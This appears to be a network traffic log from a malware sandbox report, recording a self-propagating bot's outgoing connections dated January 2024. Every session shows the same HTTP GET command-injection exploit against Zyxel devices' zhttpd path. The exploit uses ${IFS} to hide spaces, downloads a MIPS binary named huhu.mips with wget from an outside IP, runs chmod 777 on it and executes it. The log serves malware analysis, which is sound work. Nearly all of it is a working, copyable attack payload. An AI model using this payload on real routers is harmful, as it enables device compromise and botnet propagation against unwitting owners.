                                      Jan 19, 2024 17:29:33.794116020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4675192.168.2.144619495.215.221.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794147015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4676192.168.2.1456852158.229.131.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794207096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4677192.168.2.1453724143.189.145.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794235945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4678192.168.2.1433310190.159.16.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794277906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4679192.168.2.1453912175.100.154.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794312000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4680192.168.2.1443500118.175.46.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794343948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4681192.168.2.145082676.204.249.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794389963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4682192.168.2.1458796105.80.238.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794418097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4683192.168.2.14561084.210.77.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794450045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4684192.168.2.143582241.37.87.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794476032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4685192.168.2.1436510174.191.34.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794542074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4686192.168.2.1446746112.75.25.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794565916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4687192.168.2.1460086129.148.15.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794621944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4688192.168.2.145807637.194.43.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794648886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4689192.168.2.1436908101.54.134.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794720888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4690192.168.2.144396871.52.62.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794759035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4691192.168.2.1433708209.129.18.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794807911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4692192.168.2.1459918144.135.49.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794827938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4693192.168.2.145296068.139.114.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794888020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4694192.168.2.143291893.180.216.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794914961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4695192.168.2.1437754196.137.216.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.794960022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4696192.168.2.143581052.249.179.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795006037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4697192.168.2.144847014.100.51.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795038939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4698192.168.2.1444736162.187.30.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795082092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4699192.168.2.145201499.85.206.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795103073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4700192.168.2.1453904137.187.180.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795142889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4701192.168.2.144984289.32.63.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795176029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4702192.168.2.1460606141.132.149.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795202971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4703192.168.2.1440656113.213.210.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795254946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4704192.168.2.1457916191.222.178.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795300961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4705192.168.2.1442920129.191.141.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795335054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4706192.168.2.1445304219.82.43.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795380116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4707192.168.2.1446354206.73.101.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795429945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4708192.168.2.1433460221.35.244.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795458078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4709192.168.2.1451192219.107.90.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795495987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4710192.168.2.145381657.114.87.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795548916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4711192.168.2.144902278.173.63.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795591116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4712192.168.2.1446812195.9.189.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795618057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4713192.168.2.1433034142.234.37.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795659065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4714192.168.2.1439176175.133.184.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795690060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4715192.168.2.1452844145.223.194.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795728922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4716192.168.2.144193494.185.142.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795759916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4717192.168.2.1440018131.214.20.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795793056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4718192.168.2.1450018109.175.70.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795838118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4719192.168.2.144438472.197.25.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795876980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4720192.168.2.145610297.151.75.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795928955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4721192.168.2.144137413.107.62.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795964003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4722192.168.2.1448100168.75.242.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.795998096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4723192.168.2.1448298139.210.231.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796045065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4724192.168.2.1437924140.103.189.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796082973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4725192.168.2.1448730102.99.202.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796129942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4726192.168.2.145058697.178.195.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796180010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4727192.168.2.14480482.90.69.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796216011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4728192.168.2.1453290163.197.201.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796281099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4729192.168.2.14565321.46.162.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796304941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4730192.168.2.1440298186.25.157.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796348095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4731192.168.2.1453378187.135.190.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796377897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4732192.168.2.1454792144.250.231.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796438932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4733192.168.2.14350842.39.10.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796453953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4734192.168.2.144260281.46.27.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796492100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4735192.168.2.145606223.186.91.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796535015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4736192.168.2.145362254.11.152.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796576977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4737192.168.2.14413621.16.225.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.796612978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4738192.168.2.1441346216.246.138.130443
                                      TimestampBytes transferredDirectionData
